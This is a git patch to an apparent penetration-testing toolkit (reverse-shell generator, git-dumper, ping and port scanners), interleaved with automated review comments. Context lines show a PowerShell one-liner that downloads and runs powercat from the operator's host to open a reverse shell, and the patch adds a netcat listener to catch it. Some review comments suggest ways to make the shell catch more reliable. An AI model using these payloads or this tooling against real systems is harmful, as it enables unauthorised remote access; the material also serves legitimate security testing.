From ec70ac9c603d71dff5f1c65a9dfb13d7c9a5a603 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Fri, 14 May 2021 16:49:49 +0200
Subject: [PATCH] Ping/Portscan update, git-dumper fix, genRevShell trigger shell
---
 genRevShell.py | 5 +++++
 git-dumper.py | 11 ++++++-----
 pingscan.py | 10 +++------
 portscan.py | 12 ++++-------
 4 files changed, 18 insertions(+), 20 deletions(-)
diff --git a/genRevShell.py b/genRevShell.py
index 934a595..7ae7dc7 100755
--- a/genRevShell.py
+++ b/genRevShell.py
@@ -28,6 +28,11 @@ def generatePayload(type, local_address, port):
 elif type == "powercat" or type == "powershell":
 return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
+def triggerShell(func, port):
+ func()
+ pty.spawn(["nc", "-lvvp", str(port)])
+
+
 if __name__ == "__main__":
 if len(sys.argv) < 2:
diff --git a/git-dumper.py b/git-dumper.py
index c0ed82e..3958534 100755
--- a/git-dumper.py
+++ b/git-dumper.py
@@ -453,6 +453,7 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"):
 os.path.join(directory, module, 'FETCH_HEAD'),
 os.path.join(directory, module, 'ORIG_HEAD'),
 ]
+
 for dirpath, _, filenames in os.walk(os.path.join(directory, module, 'refs')):
 for filename in filenames:
 files.append(os.path.join(dirpath, filename))
@@ -496,11 +497,11 @@ def fetch_git(url, directory, jobs, retry, timeout, module=".git"):
 # fetch all objects
 printf('[-] Fetching objects\n')
- # process_tasks(objs,
- # FindObjectsWorker,
- # jobs,
- # args=(url, directory, retry, timeout, module),
- # tasks_done=packed_objs)
+ process_tasks(objs,
+ FindObjectsWorker,
+ jobs,
+ args=(url, directory, retry, timeout, module),
+ tasks_done=packed_objs)
 # git checkout
 if module == ".git":
diff --git a/pingscan.py b/pingscan.py
index 1acec30..58301bd 100644
--- a/pingscan.py
+++ b/pingscan.py
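Review bot: In `triggerShell`, `func()` runs before `pty.spawn(["nc", "-lvvp", str(port)])` has started the listener, so if `func` actually fires the exploit (rather than only printing the payload for manual use) a target that connects back immediately is refused and the shell is lost; start the listener first, e.g. `threading.Timer(1.0, func).start()` ahead of the `pty.spawn(...)` call (needs `import threading`), or spawn nc in a subprocess and call `func()` once it is bound. `pty` is used here without an import visible in the hunk; if it is not already imported at module level the call fails with `NameError` on first use. `nc -lvvp` listens on all interfaces, so on a shared engagement network whoever connects to `port` first owns the shell — consider binding to the address the payload was generated for (syntax differs between netcat variants). A docstring like `"""Run the trigger `func`, then hand the terminal to a netcat listener on `port`."""` would record the intended contract. The `if __name__` block below continues outside the hunk.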
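Review bot: The re-enabled `process_tasks(objs, FindObjectsWorker, ...)` completes a `.git` directory whose every byte comes from the remote `url`, and the `git checkout` step introduced by `# git checkout` (its body is outside the hunk) then runs git inside it; a hostile server can serve a `config` carrying `core.fsmonitor` or `core.hooksPath` pointing at a command, which git executes on the operator's machine during that checkout. Unless the checkout code already neutralises this, run git with those keys overridden, e.g. `git -c core.fsmonitor= -c core.hooksPath=/dev/null checkout .`, or strip such keys from `config` before checking out. The five lines were previously commented out with no reason recorded, so a short comment above the call saying why the object fetch is required (presumably the checkout needs the loose objects — confirm) would keep the next reader from disabling it again. `fetch_git` begins and ends outside the hunk.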
@@ -4,20 +4,16 @@ import sys
 import os
 import ipaddress
 import subprocess
-from importlib import util
-threading_spec = util.find_spec("threading")
-queue_spec = util.find_spec("queue")
-
-if threading_spec is not None and queue_spec is not None:
+try:
 import threading
 import queue
 NUM_THREADS = 10
 THREADING_ENABLED = True
 QUEUE = queue.Queue()
-else:
+except:
 THREADING_ENABLED = False
-
+
 def checkHost(host):
 proc = subprocess.Popen(["ping", str(host), "-c", "1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
 return proc.wait() == 0
diff --git a/portscan.py b/portscan.py
index a6e850c..f385e05 100644
--- a/portscan.py
+++ b/portscan.py
@@ -3,22 +3,18 @@ import socket
 import sys
 import re
-from importlib import util
-threading_spec = util.find_spec("threading")
-queue_spec = util.find_spec("queue")
-
-if threading_spec is not None and queue_spec is not None:
+try:
 import threading
 import queue
 NUM_THREADS = 10
 THREADING_ENABLED = True
 QUEUE = queue.Queue()
-else:
+except:
 THREADING_ENABLED = False
 if len(sys.argv) < 2:
- print("Usage: %s [ports] [num_threads]")
+ print("Usage: %s [ports] [num_threads]" % sys.argv[0])
 exit(1)
 host = sys.argv[1]
@@ -26,7 +22,7 @@ ports = range(1,1001)
 if len(sys.argv) >= 3:
 ports_param = sys.argv[2]
- pattern = re.compile("^(\\d)+(-(\\d+)?)?$")
+ pattern = re.compile("^(\\d+)(-(\\d+)?)?$")
 m = pattern.match(ports_param)
 if m is None:
 print("Invalid port range")
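Review bot: The new `except:` that replaces `else:` is a bare except, so any exception raised inside the `try` body — a `KeyboardInterrupt` during startup or an error constructing `queue.Queue()`, not only a missing module — is swallowed and the script silently drops to the single-threaded path; narrow it to `except ImportError:`. The `find_spec` probing it replaces only tested importability, so `ImportError` keeps the behaviour equivalent while still surfacing real errors. A comment such as `# threading/queue are stdlib; the serial fallback is for stripped-down interpreters` would explain why the fallback exists at all.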
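Review bot: As in pingscan.py, the bare `except:` introduced after `QUEUE = queue.Queue()` hides every exception from the `try` body rather than only a missing module, turning a `KeyboardInterrupt` or a failure inside the block into a silent single-threaded run; use `except ImportError:` in both files so they stay consistent. The usage line now interpolates `sys.argv[0]`, but it still omits the mandatory first argument that `host = sys.argv[1]` reads three lines later, so a user who triggers it is told nothing about what is missing; `print("Usage: %s <host> [ports] [num_threads]" % sys.argv[0])` documents the required positional.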
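Review bot: The corrected pattern `"^(\\d+)(-(\\d+)?)?$"` still accepts out-of-range and inverted inputs such as `0`, `70000` or `1000-1`; the code that turns the match into `ports` is outside the hunk, so unless it checks bounds there a port above 65535 will likely fail inside `socket` and an inverted range will presumably scan nothing. Validate `1 <= start <= end <= 65535` after `m = pattern.match(ports_param)` and reuse the existing `print("Invalid port range")` path for anything else. Writing the pattern as a raw string, `pattern = re.compile(r"^(\d+)(-(\d+)?)?$")`, removes the double escaping, and `re.ASCII` (or `[0-9]`) keeps `\d` from matching non-ASCII digits.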